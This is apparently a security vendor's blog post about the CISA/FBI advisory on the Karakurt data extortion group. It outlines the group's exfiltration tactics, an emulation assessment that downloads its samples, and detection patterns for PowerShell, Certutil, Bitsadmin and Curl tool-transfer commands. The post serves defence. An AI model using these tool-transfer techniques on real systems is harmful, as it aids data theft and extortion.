Response to US-CERT Alert AA22-152A – Karakurt Data Extortion Group 

AttackIQ has released a new scenario and assessment in response to US-CERT Alert AA22-152A, Karakurt Data Extortion Group  Read More

On 2022 June 1, 2022, the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Department of the Treasury (Treasury), and the Financial Crimes Enforcement Network (FinCEN) released joint Cybersecurity Advisory (CSA) to provide information on the Karakurt data extortion group, also known as the Karakurt Team and Karakurt Lair.  

The Karakurt threat actors do not perform traditional ransomware operations where files are locked and encrypted, but instead focus on exfiltrating sensitive files and then threatening victims with data leaks or auctions unless a Bitcoin ransom has been paid. Their access to victim organizations is typically bought from other initial access broker groups or by purchasing stolen credential dumps that can be leveraged to login to the victim’s legitimate network systems. The actors do not target specific sectors or victims but choose based on ease of access.  

Once access to the victim’s network has been established, the threat actor leverages Cobalt Strike or living off the land techniques to blend in with everyday activities. They commonly bring down legitimate tools like FileZilla and Rclone to exfiltrate data to their cloud servers. 

To assist customers with protecting their environment from these attacks, AttackIQ has released a new assessment that emulates the Ingress Tool Transfer (T1105) technique to bring down the actor’s tools and malware. These scenarios test both the network and endpoint controls in a customer’s environment to prevent known malicious files. 

This assessment takes the following steps: 

  1. Download and Save Karakurt’s PDF Phishing Files: These PDFs are sent to potential victims asking them to download and open a malicious Microsoft Office document that leads to malware being installed.
  2. Download and Save Karakurt’s Cobalt Strike Beacon malware: Like many threat actors, Karakurt relies on Cobalt Strike for post compromise activities.
  3. Download and Save FileZilla: FileZilla is a legitimate open-source FTP and SFTP client that can be used via a graphical interface to upload and download files to remote servers. Karakurt uses this software to send the stolen files to their infrastructure.
  4. Download and Save Rclone: Rclone is a command-line tool that allows for synchronizing of files to remote cloud stores or remote file servers.
  5. Download and Save Microsoft Command Line XSL Transformation Tool: Msxsl.exe is a legitimate command line tool from Microsoft that can be abused by actors to bypass application whitelisting controls. The tool loads XML files that can have malicious scripts embedded inside that will run inside the Msxsl process. 

Detection Process
Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl. 

PowerShell Example: 

Process Name == (Cmd.exe OR Powershell.exe) 
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”) 

Certutil Example: 

Process Name == Certutil.exe 
Command Line Contains (“-urlcache” AND “-f”) 

Bitsadmin Example: 

Process Name == Bitsadmin.exe 
Command Line CONTAINS (“/transfer” AND “http”) 

Curl Example: 

Process Name == Curl.exe 
Command Line CONTAINS (“http” AND “-o”) 

Additionally downloads of file transfer utilities from the legitimate sites should be scrutinized to ensure the requests were made by real users. 

Mitigation Policies
It is advised that non administrators are prevented from being able to utilize tools such as powershell.exe, cmd.exe, and certutil.exe. This will prevent malicious usage of these tools on end user accounts. 

The Adversary Research Team at AttackIQ is currently reviewing additional details about Karakurt compromises and will be releasing in the coming days an advanced attack graph that will emulate the actor’s behaviors in a larger kill chain.  

In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat. 

AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.